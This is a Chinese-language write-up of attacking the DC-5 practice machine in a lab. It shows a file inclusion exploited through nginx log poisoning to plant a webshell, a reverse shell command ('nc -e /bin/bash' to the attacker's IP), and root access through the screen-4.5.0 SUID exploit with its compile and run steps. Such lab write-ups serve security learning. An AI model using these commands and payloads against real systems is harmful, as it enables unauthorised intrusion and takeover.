dc-5靶机渗透记录
实验环境
- 靶机:DC-5靶机(192.168.126.137)
- 攻击机:kali Linux(192.168.126.129)
信息收集
ip:192.168.126.137
开放的端口:
80/tcp open http nginx 1.6.2
111/tcp open rpcbind 2-4 (RPC #100000)
运行: Linux 3.X|4.X
操作系统CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
操作系统详细信息: Linux 3.2 - 4.9
渗透测试
1.漏洞发现与getshell
发现打开了80端口,这里我们登上直接web端
在contact页面发现有留言板块,这里的话考虑xss
然后…就没有然后了,显然是不存在的
通过查一下大佬们的博客,发现在提交后的thankyou.php页面存在文件包含漏洞,自己上手试一下
验证成功,发现存在文件包含漏洞
到这里的话,就不知道该如何继续了,百度之后,发现了大神们的骚操作
利用nginx日志实现写入webshell
http://192.168.126.137/thankyou.php?file=/var/log/nginx/access.log
http://192.168.126.137/thankyou.php?file=/var/log/nginx/error.log
这里写入shell,打开error.log发现并没有报错日志,判定可以进行日志写入shell
这里看到蚁🗡连接成功,拿到webshell
2.提权
nc -e /bin/bash 192.168.126.129 4567
可以看到,反弹shell成功,获取交互
python -c 'import pty;pty.spawn("/bin/bash")'
经过一番文件查找,也没有找到有用的信息
思考其他的提权方法
想到可以通过suid进行提权
查找具有suid权限的命令
find / -perm /4000 2>dev/null
发现screen-4.5.0,这里可以直接使用kali查找发现screen-4.5.0的漏洞脚本文件
searchsploit screen 4.5.0
cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh
cp /usr/share/exploitdb/exploits/linux/local/41152.txt 41152.txt
gcc -fPIC -shared -ldl -o libhax.so libhax.c
将41154.sh中下面一部分c语言代码另存为rootshell.c
gcc -o rootshell rootshell.c
将41154.sh中剩下部分代码另存为dc5.sh脚本文件
并在保存dc5.sh文件输入 :set ff=unix ,否则在执行脚本文件时后出错
将三个文件通过蚁🗡上传到/tmp目录下
www-data@dc-5:/tmp$ chmod +x dc5.sh
www-data@dc-5:/tmp$ ./dc5.sh
获取root权限后,进入root目录下,成功获取thisistheflag.txt文件
总结
渗透步骤
1.在web端使用xss,发现留言板,使用xss失败后,进行文件包含漏洞利用;
2.通过利用nginx日志实现写入webshell,使用蚁🗡连接;
3.执行反弹shell,getshell成功;
4.通过suid进行提权;
自我总结
1.爆破后台路径的字典不够,导致基本上是通过看大佬的博客来直接操作的;
2.对于漏洞脚本文件不够了解,导致即使kali里面可以直接搜索到漏洞的脚本文件,也不会使用;